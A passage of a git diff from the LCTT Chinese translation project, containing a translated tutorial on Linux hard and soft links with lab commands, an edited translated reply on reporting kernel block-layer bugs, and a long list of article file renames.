,而软链接直接指向一个目录项,即指向一个硬链接。因为软链接指向的是一个文件的硬链接而非该文件的 inode ,所以它们并不依赖于 inode 号,这使得它们能跨越不同的文件系统、分区和逻辑卷起作用。 + +软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,`ls` 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 + +### 实验项目: 链接实验 + +我认为最容易理解链接用法及其差异的方法是动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 `~/temp` 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 + +#### 初始工作 + +首先,在你要进行实验的目录下为该项目中的任务创建一个临时目录,确保当前工作目录(PWD)是你的主目录,然后键入下列命令。 + +``` +mkdir temp +``` + +使用这个命令将当前工作目录切换到 `~/temp`。 + +``` +cd temp +``` + +实验开始,我们需要创建一个能够链接到的文件,下列命令可完成该工作并向其填充内容。 + +``` +du -h > main.file.txt +``` + +使用 `ls -l` 长列表命名确认文件正确地创建了。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 + +``` +[dboth@david temp]$ ls -l +total 4 +-rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +在列表中,文件模式串后的数字 `1` 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 + +#### 对硬链接进行实验 + +硬链接创建一个指向同一 inode 的新目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 `~/temp`。创建一个指向 `main.file.txt` 的硬链接,然后查看该目录下文件列表。 + +``` +[dboth@david temp]$ ln main.file.txt link1.file.txt +[dboth@david temp]$ ls -l +total 8 +-rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +目录中两个文件都有两个链接且大小相同,时间戳也一样。这就是有一个 inode 和两个硬链接(即该文件的目录项)的一个文件。再建立一个该文件的硬链接,并列出目录清单内容。你可以建立硬链接: `link1.file.txt` 或 `main.file.txt`。 + +``` +[dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l +total 16 +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link2.file.txt +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +注意,该目录下的每个硬链接必须使用不同的名称,因为同一目录下的两个文件不能拥有相同的文件名。试着创建一个和现存链接名称相同的硬链接。 + +``` +[dboth@david temp]$ ln main.file.txt link2.file.txt +ln: failed to create hard link 'link2.file.txt': File exists +``` + +显然不行,因为 `link2.file.txt` 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录(你的主目录)中创建一个链接。 + +``` +[dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +上面的 `ls` 命令显示 `main.file.txt` 文件确实存在于主目录中,且与该文件在 `temp` 目录中的名称一致。当然它们不是不同的文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 `temp` 目录中添加一个非链接文件。 + +``` +[dboth@david temp]$ touch unlinked.file ; ls -l +total 12 +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +-rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +使用 `ls` 命令的 `i` 选项查看 inode 的硬链接号和新创建文件的硬链接号。 + +``` +[dboth@david temp]$ ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +注意上面文件模式左边的数字 `657024` ,这是三个硬链接文件所指的同一文件的 inode 号,你也可以使用 `i` 选项查看主目录中所创建的链接的节点号,和该值相同。而那个只有一个链接的 inode 号和其他的不同,在你的系统上看到的 inode 号或许不同于本文中的。 + +接着改变其中一个硬链接文件的大小。 + +``` +[dboth@david temp]$ df -h > link2.file.txt ; ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +现在所有的硬链接文件大小都比原来大了,因为多个目录项都链接着同一文件。 + +下个实验在我的电脑上会出现这样的结果,是因为我的 `/tmp` 目录在一个独立的逻辑卷上。如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U 盘,如果上述方式适合你,你可以进行这个实验。 + +试着在 `/tmp` 目录中建立一个 `~/temp` 目录下文件的链接(或你的文件系统所在的位置)。 + +``` +[dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt +ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': +Invalid cross-device link +``` + +为什么会出现这个错误呢? 原因是每一个单独的可挂载文件系统都有一套自己的 inode 号。简单的通过 inode 号来跨越整个 Linux 文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 + +有时你可能会想找到一个 inode 的所有硬链接。你可以使用 `ls -li` 命令。然后使用 `find` 命令找到所有硬链接的节点号。 + +``` +[dboth@david temp]$ find . -inum 657024 +./main.file.txt +./link1.file.txt +./link2.file.txt +``` + +注意 `find` 命令不能找到所属该节点的四个硬链接,因为我们在 `~/temp` 目录中查找。 `find` 命令仅在当前工作目录及其子目录中查找文件。要找到所有的硬链接,我们可以使用下列命令,指定你的主目录作为起始查找条件。 + +``` +[dboth@david temp]$ find ~ -samefile main.file.txt +/home/dboth/temp/main.file.txt +/home/dboth/temp/link1.file.txt +/home/dboth/temp/link2.file.txt +/home/dboth/main.file.txt +``` + +如果你是非超级用户,没有权限,可能会看到错误信息。这个命令也使用了 `-samefile` 选项而不是指定文件的节点号。这个效果和使用 inode 号一样且更容易,如果你知道其中一个硬链接名称的话。 + +#### 对软链接进行实验 + +如你刚才看到的,不能跨越文件系统边界创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然它们可以达到相同的目的,但它们是非常不同的,知道这些差异是很重要的。 + +让我们在 `~/temp` 目录中创建一个符号链接来开始我们的探索。 + +``` +[dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +拥有节点号 `657024` 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的 inode 号 `658270`。 名为 `link3.file.txt` 的软链接指向了 `link2.file.txt` 文件。使用 `cat` 命令查看 `link3.file.txt` 文件的内容。符号链接的 inode 信息以字母 `l` (小写字母 l)开头,意味着这个文件实际是个符号链接。 + +上例中软链接文件 `link3.file.txt` 的大小只有 14 字节。这是文本内容 `link3.file.txt` 的大小,即该目录项的实际内容。目录项 `link3.file.txt` 并不指向一个 inode ;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 `/tmp` 目录中尝试过的。 + +``` +[dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt +/tmp/link3.file.txt ; ls -l /tmp/link* +lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> +/home/dboth/temp/link2.file.txt +``` + +#### 删除链接 + +当你删除硬链接或硬链接所指的文件时,需要考虑一些问题。 + +首先,让我们删除硬链接文件 `main.file.txt`。注意指向 inode 的每个目录项就是一个硬链接。 + +``` +[dboth@david temp]$ rm main.file.txt ; ls -li +total 8 +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link2.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +`main.file.txt` 是该文件被创建时所创建的第一个硬链接。现在删除它,仍然保留着原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 + +现在删除 `link2.file.txt` 硬链接文件。 + +``` +[dboth@david temp]$ rm link2.file.txt ; ls -li +total 8 +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标的硬链接会闪烁显示。如果需要修复这个损坏的软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除就行。您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 `rm` 命令删除它们。 + +`unlink` 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 `rm` 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 + +### 写在最后 + +我用过这两种类型的链接很长一段时间后,我开始了解它们的能力和特质。我为我所教的 Linux 课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 + +-------------------------------------------------------------------------------- + +作者简介: + +戴维.布斯 - 戴维.布斯是 Linux 和开源倡导者,居住在北卡罗莱纳的罗列 。他在 IT 行业工作了四十年,为 IBM 工作了 20 多年的 OS/2。在 IBM 时,他在 1981 年编写了最初的 IBM PC 的第一个培训课程。他为 RedHat 教授过 RHCE 班,并曾在 MCI Worldcom、思科和北卡罗莱纳州工作。他已经用 Linux 和开源软件工作将近 20 年了。 + +--------------------------------- + +via: https://opensource.com/article/17/6/linking-linux-filesystem + +作者:[David Both][a] +译者:[yongshouzhang](https://github.com/yongshouzhang) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/resources/what-is-linux?src=linux_resource_menu +[2]:https://opensource.com/resources/what-are-linux-containers?src=linux_resource_menu +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=7016000000127cYAAQ +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?src=linux_resource_menu&intcmp=7016000000127cYAAQ +[5]:https://opensource.com/tags/linux?src=linux_resource_menu +[6]:https://opensource.com/article/17/6/linking-linux-filesystem?rate=YebHxA-zgNopDQKKOyX3_r25hGvnZms_33sYBUq-SMM +[7]:https://opensource.com/user/14106/feed +[8]:https://www.flickr.com/photos/digypho/7905320090 +[9]:https://creativecommons.org/licenses/by/2.0/ +[10]:https://linux.cn/article-8685-1.html +[11]:https://linux.cn/article-8099-1.html +[12]:https://linux.cn/article-8887-1.html +[13]:https://opensource.com/business/16/9/linux-users-guide-lvm +[14]:https://opensource.com/life/15/9/everything-is-a-file +[15]:https://linux.cn/article-8685-1.html +[16]:https://linux.cn/article-8685-1.html#3_19182 +[17]:https://opensource.com/users/dboth +[18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments diff --git a/translated/tech/20171009 Examining network connections on Linux systems.md b/published/20171009 Examining network connections on Linux systems.md similarity index 100% rename from translated/tech/20171009 Examining network connections on Linux systems.md rename to published/20171009 Examining network connections on Linux systems.md diff --git a/translated/tech/20171029 A block layer introduction part 1 the bio layer.md b/published/20171029 A block layer introduction part 1 the bio layer.md similarity index 95% rename from translated/tech/20171029 A block layer introduction part 1 the bio layer.md rename to published/20171029 A block layer introduction part 1 the bio layer.md index bc3f582259..96374c2302 100644 --- a/translated/tech/20171029 A block layer introduction part 1 the bio layer.md +++ b/published/20171029 A block layer introduction part 1 the bio layer.md @@ -1,4 +1,4 @@ -块层介绍第一部分:块 I/O 层 +回复:块层介绍第一部分 - 块 I/O 层 ============================================================ ### 块层介绍第一部分:块 I/O 层 @@ -6,9 +6,14 @@ 回复:amarao 在[块层介绍第一部分:块 I/O 层][1] 中提的问题 先前的文章:[块层介绍第一部分:块 I/O 层][2] +![](https://static.lwn.net/images/2017/neil-blocklayer.png) + 嗨, + 你在这里描述的问题与块层不直接相关。这可能是一个驱动错误、可能是一个 SCSI 层错误,但绝对不是一个块层的问题。 + 不幸的是,报告针对 Linux 的错误是一件难事。有些开发者拒绝去看 bugzilla,有些开发者喜欢它,有些(像我这样)只能勉强地使用它。 + 另一种方法是发送电子邮件。为此,你需要选择正确的邮件列表,还有也许是正确的开发人员,当他们心情愉快,或者不是太忙或者不是假期时找到它们。有些人会努力回复所有,有些是完全不可预知的 - 这对我来说通常会发送一个补丁,包含一些错误报告。如果你只是有一个你自己几乎都不了解的 bug,那么你的预期响应率可能会更低。很遗憾,但这是是真的。 许多 bug 都会得到回应和处理,但很多 bug 都没有。 @@ -16,18 +21,20 @@ 我不认为说没有人关心是公平的,但是没有人认为它如你想的那样重要是有可能的。如果你想要一个解决方案,那么你需要驱动它。一个驱动它的方法是花钱请顾问或者与经销商签订支持合同。我怀疑你的情况没有上面的可能。另一种方法是了解代码如何工作,并自己找到解决方案。很多人都这么做,但是这对你来说可能不是一种选择。另一种方法是在不同的相关论坛上不断提出问题,直到得到回复。坚持可以见效。你需要做好准备去执行任何你所要求的测试,可能包括建立一个新的内核来测试。 如果你能在最近的内核(4.12 或者更新)上复现这个 bug,我建议你邮件报告给 linux-kernel@vger.kernel.org、linux-scsi@vger.kernel.org 和我(neilb@suse.com)(注意你不必订阅这些列表来发送邮件,只需要发送就行)。描述你的硬件以及如何触发问题的。 + 包含所有进程状态是 “D” 的栈追踪。你可以用 “cat /proc/$PID/stack” 来得到它,这里的 “$PID” 是进程的 pid。 确保避免抱怨或者说这个已经坏了好几年了以及这是多么严重不足。没有人关心这个。我们关心的是 bug 以及如何修复它。因此只要报告相关的事实就行。 + 尝试在邮件中而不是链接到其他地方的链接中包含所有事实。有时链接是需要的,但是对于你的脚本,它只有 8 行,所以把它包含在邮件中就行(并避免像 “fuckup” 之类的描述。只需称它为“坏的”(broken)或者类似的)。同样确保你的邮件发送的不是 HTML 格式。我们喜欢纯文本。HTML 被所有的 @vger.kernel.org 邮件列表拒绝。你或许需要配置你的邮箱程序不发送 HTML。 -------------------------------------------------------------------------------- via: https://lwn.net/Articles/737655/ -作者:[ neilbrown][a] +作者:[neilbrown][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/20141028 When Does Your OS Run.md b/published/201711/20141028 When Does Your OS Run.md similarity index 100% rename from published/20141028 When Does Your OS Run.md rename to published/201711/20141028 When Does Your OS Run.md diff --git a/published/20170202 Understanding Firewalld in Multi-Zone Configurations.md b/published/201711/20170202 Understanding Firewalld in Multi-Zone Configurations.md similarity index 100% rename from published/20170202 Understanding Firewalld in Multi-Zone Configurations.md rename to published/201711/20170202 Understanding Firewalld in Multi-Zone Configurations.md diff --git a/published/20170227 Ubuntu Core in LXD containers.md b/published/201711/20170227 Ubuntu Core in LXD containers.md similarity index 100% rename from published/20170227 Ubuntu Core in LXD containers.md rename to published/201711/20170227 Ubuntu Core in LXD containers.md diff --git a/published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md b/published/201711/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md similarity index 100% rename from published/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md rename to published/201711/20170418 INTRODUCING MOBY PROJECT A NEW OPEN-SOURCE PROJECT TO ADVANCE THE SOFTWARE CONTAINERIZATION MOVEMENT.md diff --git a/published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md b/published/201711/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md similarity index 100% rename from published/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md rename to published/201711/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md diff --git a/published/20170608 The Life-Changing Magic of Tidying Up Code.md b/published/201711/20170608 The Life-Changing Magic of Tidying Up Code.md similarity index 100% rename from published/20170608 The Life-Changing Magic of Tidying Up Code.md rename to published/201711/20170608 The Life-Changing Magic of Tidying Up Code.md diff --git a/published/20170706 Wildcard Certificates Coming January 2018.md b/published/201711/20170706 Wildcard Certificates Coming January 2018.md similarity index 100% rename from published/20170706 Wildcard Certificates Coming January 2018.md rename to published/201711/20170706 Wildcard Certificates Coming January 2018.md diff --git a/published/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md b/published/201711/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md similarity index 100% rename from published/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md rename to published/201711/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md diff --git a/published/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md b/published/201711/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md similarity index 100% rename from published/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md rename to published/201711/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md diff --git a/published/20170928 3 Python web scrapers and crawlers.md b/published/201711/20170928 3 Python web scrapers and crawlers.md similarity index 100% rename from published/20170928 3 Python web scrapers and crawlers.md rename to published/201711/20170928 3 Python web scrapers and crawlers.md diff --git a/published/20171002 Scaling the GitLab database.md b/published/201711/20171002 Scaling the GitLab database.md similarity index 100% rename from published/20171002 Scaling the GitLab database.md rename to published/201711/20171002 Scaling the GitLab database.md diff --git a/published/20171003 PostgreSQL Hash Indexes Are Now Cool.md b/published/201711/20171003 PostgreSQL Hash Indexes Are Now Cool.md similarity index 100% rename from published/20171003 PostgreSQL Hash Indexes Are Now Cool.md rename to published/201711/20171003 PostgreSQL Hash Indexes Are Now Cool.md diff --git a/published/20171004 No the Linux desktop hasnt jumped in popularity.md b/published/201711/20171004 No the Linux desktop hasnt jumped in popularity.md similarity index 100% rename from published/20171004 No the Linux desktop hasnt jumped in popularity.md rename to published/201711/20171004 No the Linux desktop hasnt jumped in popularity.md diff --git a/published/20171007 Instant 100 command line productivity boost.md b/published/201711/20171007 Instant 100 command line productivity boost.md similarity index 100% rename from published/20171007 Instant 100 command line productivity boost.md rename to published/201711/20171007 Instant 100 command line productivity boost.md diff --git a/published/20171008 8 best languages to blog about.md b/published/201711/20171008 8 best languages to blog about.md similarity index 100% rename from published/20171008 8 best languages to blog about.md rename to published/201711/20171008 8 best languages to blog about.md diff --git a/published/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md b/published/201711/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md similarity index 100% rename from published/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md rename to published/201711/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md diff --git a/published/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md b/published/201711/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md similarity index 100% rename from published/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md rename to published/201711/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md diff --git a/published/20171011 How to set up a Postgres database on a Raspberry Pi.md b/published/201711/20171011 How to set up a Postgres database on a Raspberry Pi.md similarity index 100% rename from published/20171011 How to set up a Postgres database on a Raspberry Pi.md rename to published/201711/20171011 How to set up a Postgres database on a Raspberry Pi.md diff --git a/published/20171011 Why Linux Works.md b/published/201711/20171011 Why Linux Works.md similarity index 100% rename from published/20171011 Why Linux Works.md rename to published/201711/20171011 Why Linux Works.md diff --git a/published/20171013 6 reasons open source is good for business.md b/published/201711/20171013 6 reasons open source is good for business.md similarity index 100% rename from published/20171013 6 reasons open source is good for business.md rename to published/201711/20171013 6 reasons open source is good for business.md diff --git a/published/20171013 Best of PostgreSQL 10 for the DBA.md b/published/201711/20171013 Best of PostgreSQL 10 for the DBA.md similarity index 100% rename from published/20171013 Best of PostgreSQL 10 for the DBA.md rename to published/201711/20171013 Best of PostgreSQL 10 for the DBA.md diff --git a/published/20171015 How to implement cloud-native computing with Kubernetes.md b/published/201711/20171015 How to implement cloud-native computing with Kubernetes.md similarity index 100% rename from published/20171015 How to implement cloud-native computing with Kubernetes.md rename to published/201711/20171015 How to implement cloud-native computing with Kubernetes.md diff --git a/published/20171015 Monitoring Slow SQL Queries via Slack.md b/published/201711/20171015 Monitoring Slow SQL Queries via Slack.md similarity index 100% rename from published/20171015 Monitoring Slow SQL Queries via Slack.md rename to published/201711/20171015 Monitoring Slow SQL Queries via Slack.md diff --git a/published/20171015 Why Use Docker with R A DevOps Perspective.md b/published/201711/20171015 Why Use Docker with R A DevOps Perspective.md similarity index 100% rename from published/20171015 Why Use Docker with R A DevOps Perspective.md rename to published/201711/20171015 Why Use Docker with R A DevOps Perspective.md diff --git a/published/20171016 Introducing CRI-O 1.0.md b/published/201711/20171016 Introducing CRI-O 1.0.md similarity index 100% rename from published/20171016 Introducing CRI-O 1.0.md rename to published/201711/20171016 Introducing CRI-O 1.0.md diff --git a/published/20171017 A tour of Postgres Index Types.md b/published/201711/20171017 A tour of Postgres Index Types.md similarity index 100% rename from published/20171017 A tour of Postgres Index Types.md rename to published/201711/20171017 A tour of Postgres Index Types.md diff --git a/published/20171017 Image Processing on Linux.md b/published/201711/20171017 Image Processing on Linux.md similarity index 100% rename from published/20171017 Image Processing on Linux.md rename to published/201711/20171017 Image Processing on Linux.md diff --git a/published/20171018 How containers and microservices change security.md b/published/201711/20171018 How containers and microservices change security.md similarity index 100% rename from published/20171018 How containers and microservices change security.md rename to published/201711/20171018 How containers and microservices change security.md diff --git a/published/20171018 Learn how to program in Python by building a simple dice game.md b/published/201711/20171018 Learn how to program in Python by building a simple dice game.md similarity index 100% rename from published/20171018 Learn how to program in Python by building a simple dice game.md rename to published/201711/20171018 Learn how to program in Python by building a simple dice game.md diff --git a/published/20171018 Tips to Secure Your Network in the Wake of KRACK.md b/published/201711/20171018 Tips to Secure Your Network in the Wake of KRACK.md similarity index 100% rename from published/20171018 Tips to Secure Your Network in the Wake of KRACK.md rename to published/201711/20171018 Tips to Secure Your Network in the Wake of KRACK.md diff --git a/published/20171019 3 Simple Excellent Linux Network Monitors.md b/published/201711/20171019 3 Simple Excellent Linux Network Monitors.md similarity index 100% rename from published/20171019 3 Simple Excellent Linux Network Monitors.md rename to published/201711/20171019 3 Simple Excellent Linux Network Monitors.md diff --git a/published/20171019 How to manage Docker containers in Kubernetes with Java.md b/published/201711/20171019 How to manage Docker containers in Kubernetes with Java.md similarity index 100% rename from published/20171019 How to manage Docker containers in Kubernetes with Java.md rename to published/201711/20171019 How to manage Docker containers in Kubernetes with Java.md diff --git a/published/20171020 3 Tools to Help You Remember Linux Commands.md b/published/201711/20171020 3 Tools to Help You Remember Linux Commands.md similarity index 100% rename from published/20171020 3 Tools to Help You Remember Linux Commands.md rename to published/201711/20171020 3 Tools to Help You Remember Linux Commands.md diff --git a/published/20171020 Running Android on Top of a Linux Graphics Stack.md b/published/201711/20171020 Running Android on Top of a Linux Graphics Stack.md similarity index 100% rename from published/20171020 Running Android on Top of a Linux Graphics Stack.md rename to published/201711/20171020 Running Android on Top of a Linux Graphics Stack.md diff --git a/published/20171024 Top 5 Linux pain points in 2017.md b/published/201711/20171024 Top 5 Linux pain points in 2017.md similarity index 100% rename from published/20171024 Top 5 Linux pain points in 2017.md rename to published/201711/20171024 Top 5 Linux pain points in 2017.md diff --git a/published/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md b/published/201711/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md similarity index 100% rename from published/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md rename to published/201711/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md diff --git a/published/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md b/published/201711/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md similarity index 100% rename from published/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md rename to published/201711/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md diff --git a/published/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md b/published/201711/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md similarity index 100% rename from published/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md rename to published/201711/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md diff --git a/published/20171026 But I dont know what a container is .md b/published/201711/20171026 But I dont know what a container is .md similarity index 100% rename from published/20171026 But I dont know what a container is .md rename to published/201711/20171026 But I dont know what a container is .md diff --git a/published/20171026 Why is Kubernetes so popular.md b/published/201711/20171026 Why is Kubernetes so popular.md similarity index 100% rename from published/20171026 Why is Kubernetes so popular.md rename to published/201711/20171026 Why is Kubernetes so popular.md diff --git a/published/20171101 How to use cron in Linux.md b/published/201711/20171101 How to use cron in Linux.md similarity index 100% rename from published/20171101 How to use cron in Linux.md rename to published/201711/20171101 How to use cron in Linux.md diff --git a/published/20171101 We re switching to a DCO for source code contributions.md b/published/201711/20171101 We re switching to a DCO for source code contributions.md similarity index 100% rename from published/20171101 We re switching to a DCO for source code contributions.md rename to published/201711/20171101 We re switching to a DCO for source code contributions.md diff --git a/published/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md b/published/201711/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md similarity index 100% rename from published/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md rename to published/201711/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md diff --git a/published/20171106 Finding Files with mlocate.md b/published/201711/20171106 Finding Files with mlocate.md similarity index 100% rename from published/20171106 Finding Files with mlocate.md rename to published/201711/20171106 Finding Files with mlocate.md diff --git a/published/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md b/published/201711/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md similarity index 100% rename from published/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md rename to published/201711/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md diff --git a/published/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md b/published/201711/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md similarity index 100% rename from published/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md rename to published/201711/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md diff --git a/published/20171107 AWS adopts home-brewed KVM as new hypervisor.md b/published/201711/20171107 AWS adopts home-brewed KVM as new hypervisor.md similarity index 100% rename from published/20171107 AWS adopts home-brewed KVM as new hypervisor.md rename to published/201711/20171107 AWS adopts home-brewed KVM as new hypervisor.md diff --git a/published/20171107 How I created my first RPM package in Fedora.md b/published/201711/20171107 How I created my first RPM package in Fedora.md similarity index 100% rename from published/20171107 How I created my first RPM package in Fedora.md rename to published/201711/20171107 How I created my first RPM package in Fedora.md diff --git a/published/20171108 Build and test applications with Ansible Container.md b/published/201711/20171108 Build and test applications with Ansible Container.md similarity index 100% rename from published/20171108 Build and test applications with Ansible Container.md rename to published/201711/20171108 Build and test applications with Ansible Container.md diff --git a/published/20171110 File better bugs with coredumpctl.md b/published/201711/20171110 File better bugs with coredumpctl.md similarity index 100% rename from published/20171110 File better bugs with coredumpctl.md rename to published/201711/20171110 File better bugs with coredumpctl.md diff --git a/published/20171114 ​Linux totally dominates supercomputers.md b/published/201711/20171114 ​Linux totally dominates supercomputers.md similarity index 100% rename from published/20171114 ​Linux totally dominates supercomputers.md rename to published/201711/20171114 ​Linux totally dominates supercomputers.md diff --git a/published/20171116 5 Coolest Linux Terminal Emulators.md b/published/201711/20171116 5 Coolest Linux Terminal Emulators.md similarity index 100% rename from published/20171116 5 Coolest Linux Terminal Emulators.md rename to published/201711/20171116 5 Coolest Linux Terminal Emulators.md diff --git a/published/20171117 How to Easily 